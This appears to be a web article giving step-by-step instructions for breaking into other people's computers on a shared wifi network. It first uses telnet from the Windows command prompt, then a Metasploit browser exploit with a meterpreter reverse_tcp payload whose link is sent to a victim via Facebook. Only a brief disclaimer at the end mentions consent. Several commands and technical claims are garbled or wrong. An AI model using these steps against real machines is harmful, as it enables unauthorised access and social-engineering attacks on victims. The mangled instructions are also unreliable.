Skip to content Skip to sidebar Skip to footer

How to Hack Someone Else's Computer or Laptop Via Wifi 2021

But the internet is always involved in daily life, such as working in the office, in the world of education and other activities.

So that it can make it easier for users to do work or other activities and the internet network is available in several forms, one of which is a wifi network.

One wifi network can be accessed or used by many people.

But do you know? If a computer or laptop is connected to the same wifi network, it can provide a loophole for hackers to hack.

Because in the same wifi network, hackers or you can hack on connected computers using CMD.

This CMD can be used easily to hack as long as the device to be connected to the same wifi network.

Apart from CMD, you can also use Linux to hack computers over a wifi network.

If you are curious, you can refer to the following review on how to hack someone else’s computer or laptop via wifi.

How to Hack Someone Else’s Computer or Laptop via Wifi

1. How to Hack Someone Else’s Computer or Laptop Via Wifi Using CMD

How to Hack Someone Else's Computer or Laptop Via Wifi
How to Hack Someone Else’s Computer or Laptop Via Wifi Using CMD

Telnet is a tool commonly used to access other people’s computers or laptops via IP addresses on a network and is commonly referred to as CMD.

But sometimes the Telnet command often fails to connect because the configuration has not been activated and it is still considered normal.

Although the Telnet command is almost similar to the remote desktop command, the difference is that Telnet is more secure because it can be controlled remotely.

So that the computer can be controlled automatically without having to hold it directly.

Meanwhile, how to hack someone else’s computer or laptop via wifi using CMD is as follows:

  • First of all, check the telnet configuration on your computer or laptop by pressing Windows key + R (click Run-say CMD, then click OK) until the Dos screen appears.
  • To check whether the telnet function can be completed, you must first check the running computer, and now type the following command.

-net, check which network (host) is currently active.

  • Then, you can try to check the hackable ports to that PC.
  • Please pay attention to the “external address” part, if you are trying to pass telnet (space) the destination IP (space)
  • noPort, then you will get an open port with port 139: telnet 192.168.16.66 139. OK, maybe this is a way to check open ports on a specific host.
  • Now how to restore the telnet command to a remote computer or other laptop that is connected to your computer or laptop, now try to use telnet PC03, the method is the same as above.
  • Telnet 192.168.16.8 (input), if successful it will be displayed as follows:

C: Documents and settingsAdminstrator>net View

Server name remarks

PC03 Lpkid

SERVER

SERVER-2003

The command complete successfully

C: Documents and settings Administrator> 192.168.2.22

pinging 192.168.2.22 with 32 bytes of data:

Request timed ot.

Reply from 192.168.2.22: bytes=32 time<1ms TTl=128

Reply from 192.168.2.22: bytes=32 time<1ms TTl=128

Request timed out.

Ping statistics for 192.168.2.22:

Packets: Sent = 4, Received = 2, Lost = 2 (50% loss),

Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 0ms, Average = 0ms

C:Documents and SettingsAdministrator>telnet 192.168.2.22

Welcome to Microsoft Telnet Client

Escape Character is ‘CTRL+]’

  • You will send the password information to a remote computer in the Internet zone. It may not be safe. Do you want to send (y / n): n (enter n, then enter).

Welcome to Microsoft Telnet Service login: ……

password:*******

Welcome to Microsoft Telnet Server.

C:Documents and Settingsadmin>

  • You need to check the IP to make sure that you are actually inside the PCO3 Computer.

Welcome to Microsoft Telnet Server.

C:Documents and Settingsadmin>ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection 2:

Connection-specific DNS Suffix . :

IP Addresses. . . . . . . : 192.168.2.22

Subnet Masks . . . . . . : 255.255.255.0

Default Gateways . . . . . . . . . : ?

C:Documents and Settingsadmin>

  • To be able to access the telnet service, it must be activated first, then any client / administrator can telnet, now you can control the computer being hacked.

2. How to Hack Other People’s Computers or Laptops Via Wifi Via Linux Terminal

How to Hack Someone Else's Computer or Laptop Via Wifi
How to Hack Someone Else’s Computer or Laptop Via Wifi Via Linux Terminal
Terminal on Linux can also be used to hack a computer or laptop over a wifi network.

Computer systems or laptops can be attacked by terminals on Linux because they use the backtracking method.

Among hackers, how to hack using a Linux terminal is already quite popular because backtrack has many advantages.

This backtrack has many versions including 1, 2, 3, 4, 5 and so on.

Apart from that, you can use derived classes from the backtracking kernel as it has the same complete tools as Backbox, Kali Linux, etc.

As for how to hack someone else’s computer or laptop via wifi via a Linux terminal, as in the following review:

1. Open Metasploit in CMD or Backtrack terminal

The method:

  • First, please download metasploit first via the following link, Click here. Then open CMD or terminal. Then run metasploit.
  • Then type the command “cd (directory location)”, for example, the location is cd c: metasploit, then press enter.
  • Then enter the next command sudo chmod + x (name of metesploit), run it and press Enter.
  • Next command code sudo ./(name metasploit) run and press enter
  • Then type msfconsole and press Enter.
  • Then type use exploit /Windows/browser/ms10_046_shorcut_icon_dllloader

2. Knowing the IP address of someone else’s computer or laptop

The method:

  • After that, type ifoncfig and you will see your IP address, then type set srvhost
  • (your IP address), press Enter and set lhost (your IP address).
  • Next type set PAYLOAD windows / meterpreteer / reverse_tcp, then press Enter and see
  • if it works, type show options then type exploit.
  • You will get ip url, like url address http://192???? then you Submit the URL via Facebook which is the destination you click on the URL.
  • Next, you will find the victim who clicked on the URL address by typing sessions-i and
  • typing session-i 1 again.

3. How to use CMD or terminal

After sesssions -i, you will see which computer clicked on your URL ip address.

Now you will execute the target by typing shell sysinfo, and you will see various directories or folders on the target computer.

The final word

Well, that’s how to use CMD and the terminal to hack someone else’s computer or laptop.

Use the methods above wisely and whatever the reason, hacking is still not justified because it can harm other people.

To be more secure, you can practice how to infiltrate other people’s computers, maybe on your own friends and of course you need to get approval first so that no one is harmed.

That’s the whole content of our article this time about how to hack someone else’s computer or laptop via wifi 2021. Hopefully useful and good luck.

Post a Comment for "How to Hack Someone Else's Computer or Laptop Via Wifi 2021"